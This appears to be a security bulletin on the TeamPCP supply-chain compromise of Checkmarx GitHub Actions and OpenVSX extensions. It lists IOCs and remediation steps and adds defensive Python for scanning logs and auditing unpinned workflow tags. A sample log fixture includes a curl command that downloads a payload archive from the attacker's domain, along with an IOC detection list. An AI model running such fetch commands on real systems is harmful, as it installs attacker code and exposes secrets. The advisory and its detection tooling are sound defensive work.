Severity: Critical | Published: 2026-03-28 | CVSS 9.4 | CVE-2026-33634 (2026-03-21) | Tags: supply-chain, ci-cd, github-actions, checkmarx, sast

TeamPCP Hits Checkmarx — Supply Chain Campaign Expands to SAST Scanners

The TeamPCP group, already behind the Trivy compromise, expands its campaign to Checkmarx GitHub Actions (KICS, AST) and VS Code extensions, stealing CI/CD secrets and cloud tokens at scale.

Context

Four days after compromising Trivy (see our dedicated bulletin), the threat actor TeamPCP / DeadCatx3 expanded their supply chain campaign to Checkmarx, targeting its GitHub Actions and VS Code extensions. The attack confirms a deliberate strategy: strike security tools themselves to reach as many CI/CD pipelines as possible.

Attack Timeline

March 19 — Initial Trivy compromise (binaries, GitHub Actions, Docker Hub images).

March 22 — Campaign expands to Trivy Docker images (v0.69.5, v0.69.6).

March 23, 12:58–16:50 UTC — TeamPCP compromises Checkmarx GitHub Actions:

  • 35 tags hijacked via force-push in checkmarx/kics-github-action and checkmarx/ast-github-action
  • Tags point to malicious commits containing an upgraded infostealer
  • Malicious VS Code extensions published on the OpenVSX registry: cx-dev-assist v1.7.0 and ast-results v2.53.0 (available ~3 hours before takedown)

Attack Vector

The attacker reused CI/CD credentials stolen during the Trivy compromise. The payload injected into GitHub Actions:

  • Harvests environment variables, cloud tokens (AWS, GCP, Azure), SSH keys, and Kubernetes tokens
  • Adds a Kubernetes persistence module not present in the Trivy version
  • Includes a fallback mechanism using GITHUB_TOKEN to create an exfiltration repository (docs-tpcp) under the victim's account

Indicators of Compromise (IOCs)

C2 infrastructure:

  • Domain: checkmarx.zone (typosquatted)
  • IP: 83.142.209.11
  • Fallback: GitHub repository docs-tpcp automatically created in victim accounts

Artifacts: tpcp.tar.gz, payload.enc

Compromised extensions: cx-dev-assist 1.7.0, ast-results 2.53.0 (OpenVSX only)

Compromised GitHub Actions: checkmarx/kics-github-action and checkmarx/ast-github-action (35 tags between 12:58 and 16:50 UTC on March 23)

Detection: search GitHub Actions logs for any references to tpcp.tar.gz, checkmarx.zone, or docs-tpcp. Check if a docs-tpcp repository exists under your GitHub accounts.
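One way to run the log search described above, as an added example that is not part of the bulletin: the script scans GitHub Actions log text for the indicators listed on this page (domain, IP, artifact names, exfiltration repository) and flags repository names that match the docs-tpcp / tpcp-docs exfiltration repos. The log lines and repository names are constructed for illustration, not captured from a real run.

```python
import re

# Indicators of compromise taken from the bulletin above.
IOCS = (
    "checkmarx.zone",   # typosquatted C2 domain
    "83.142.209.11",    # C2 IP
    "tpcp.tar.gz",      # payload archive
    "payload.enc",      # encrypted payload
    "docs-tpcp",        # fallback exfiltration repository
    "tpcp-docs",        # variant named in the remediation section
)

# Repository names the bulletin says the payload creates under the victim account.
EXFIL_REPO_NAMES = {"docs-tpcp", "tpcp-docs"}

# Constructed sample workflow log (not real output); lines 3 and 5 are meant
# to trip the IOC search, the rest are benign filler.
SAMPLE_LOG = """\
2026-03-23T13:04:11Z Run checkmarx/kics-github-action@v1.7
2026-03-23T13:04:12Z Downloading KICS binary...
2026-03-23T13:04:15Z curl -s https://checkmarx.zone/tpcp.tar.gz -o /tmp/tpcp.tar.gz
2026-03-23T13:04:16Z Scanning ./infra with 1347 queries
2026-03-23T13:04:20Z POST https://api.github.com/user/repos {"name":"docs-tpcp"}
2026-03-23T13:05:02Z Results: 0 HIGH, 2 MEDIUM
"""


def find_iocs(log_text, iocs=IOCS):
    """Return (line_number, ioc, line) for every IOC mentioned in a log line.

    Matching is a case-insensitive substring search, which is what the
    bulletin's detection guidance asks for; a line that contains several
    IOCs yields one hit per IOC so each indicator is reported.
    """
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        lowered = line.lower()
        for ioc in iocs:
            if ioc.lower() in lowered:
                hits.append((lineno, ioc, line))
    return hits


def suspicious_repos(repo_names):
    """Return repository names that match the known exfiltration repo names.

    repo_names would normally come from an org/user repository listing
    (e.g. the GitHub API); here it is just a list of strings.
    """
    return [name for name in repo_names if name.lower() in EXFIL_REPO_NAMES]


if __name__ == "__main__":
    for lineno, ioc, line in find_iocs(SAMPLE_LOG):
        print(f"line {lineno}: {ioc!r} in: {line}")
    # Constructed repository listing for illustration.
    print("exfil repos:", suspicious_repos(["infra", "docs-tpcp", "website"]))
```

Feed the real text of downloaded workflow logs (or a repository listing) into these two functions; any hit from find_iocs for a run in the March 23 window is a strong signal that the job executed the hijacked action and that every secret available to it should be treated as exposed.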

Impact

  • Any user of the compromised GitHub Actions during the window (12:58–16:50 UTC, March 23) has potentially exposed their CI/CD secrets
  • The payload is an infostealer targeting: environment variables, cloud tokens, database credentials, SSH keys, Kubernetes tokens
  • Malicious VS Code extensions were downloadable for ~3 hours

Remediation

  1. Immediately rotate all secrets accessible to workflows that used the compromised actions.
  2. Pin GitHub Actions to a full commit SHA (uses: owner/repo@<full 40-character commit SHA>) rather than a tag: tags are mutable, and force-pushed tags are exactly how these actions were hijacked.
  3. Audit workflow logs from March 19–23 for connections to checkmarx.zone, scan.aquasecurtiy.org, or 83.142.209.11.
  4. Check installed VS Code extensions — uninstall cx-dev-assist 1.7.0 and ast-results 2.53.0 if installed from OpenVSX.
  5. Check your GitHub organization for docs-tpcp or tpcp-docs repositories (exfiltration mechanisms).
  6. Update to the corrected versions published by Checkmarx.
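Step 2 can be checked mechanically across a repository's workflow files. The following added example (not code from Checkmarx or from the bulletin's authors) walks a workflow file, reports every uses: reference that is not pinned to a full 40-character commit SHA, and singles out references to the two hijacked Checkmarx actions by tag or branch, since those are the steps that could have pulled the malicious commits during the window. The workflow text is constructed, and the SHA in it is a placeholder, not a known-good Checkmarx commit.

```python
import re

# The two actions whose tags were force-pushed, per the bulletin.
COMPROMISED_ACTIONS = {
    "checkmarx/kics-github-action",
    "checkmarx/ast-github-action",
}

# Matches "uses: owner/repo[/subdir]@ref"; local "./path" steps and lines
# without an @ref are skipped on purpose. Regex rather than a YAML parser so
# the example has no dependencies; a uses: inside a multi-line string would
# be over-matched, which is acceptable for a triage pass.
USES_RE = re.compile(
    r"^\s*-?\s*uses:\s*['\"]?([\w.-]+/[\w.-]+)(/[^@\s'\"]*)?@([^\s'\"#]+)"
)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Constructed workflow (not taken from any real repository). The 40-hex value
# is a placeholder standing in for a reviewed, known-good commit.
SAMPLE_WORKFLOW = """\
name: security-scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: checkmarx/kics-github-action@v1.7
      - uses: checkmarx/ast-github-action@2.0.0
      - uses: checkmarx/ast-github-action@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
      - run: echo done
"""


def audit_workflow(yaml_text):
    """Classify every remote 'uses:' step in a workflow.

    Each finding records the action, its ref, whether the ref is a full
    commit SHA, and whether it is at risk: one of the hijacked Checkmarx
    actions referenced through a mutable tag or branch name.
    """
    findings = []
    for lineno, line in enumerate(yaml_text.splitlines(), start=1):
        m = USES_RE.match(line)
        if not m:
            continue
        action, ref = m.group(1), m.group(3)
        pinned = bool(FULL_SHA_RE.match(ref))
        findings.append({
            "line": lineno,
            "action": action,
            "ref": ref,
            "pinned": pinned,
            "at_risk": action.lower() in COMPROMISED_ACTIONS and not pinned,
        })
    return findings


def unpinned_steps(yaml_text):
    """Steps that violate the pin-by-SHA rule, regardless of vendor."""
    return [f for f in audit_workflow(yaml_text) if not f["pinned"]]


def at_risk_steps(yaml_text):
    """Steps that could have resolved to a hijacked Checkmarx tag."""
    return [f for f in audit_workflow(yaml_text) if f["at_risk"]]


if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        status = "AT RISK" if f["at_risk"] else ("pinned" if f["pinned"] else "unpinned")
        print(f"line {f['line']:>3}: {f['action']}@{f['ref']}  [{status}]")
```

Run it over every file under .github/workflows; any at-risk step whose job ran between 12:58 and 16:50 UTC on March 23 puts that job's secrets in scope for step 1's rotation, and every unpinned step is a candidate for conversion to a SHA pin once the commit has been reviewed.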

The TeamPCP Pattern

This campaign illustrates a tactical evolution: the same set of stolen credentials is reused in a cascade to compromise related projects. Trivy → Checkmarx → potentially more tools. CISA added CVE-2026-33634 to its KEV catalog on March 25, 2026.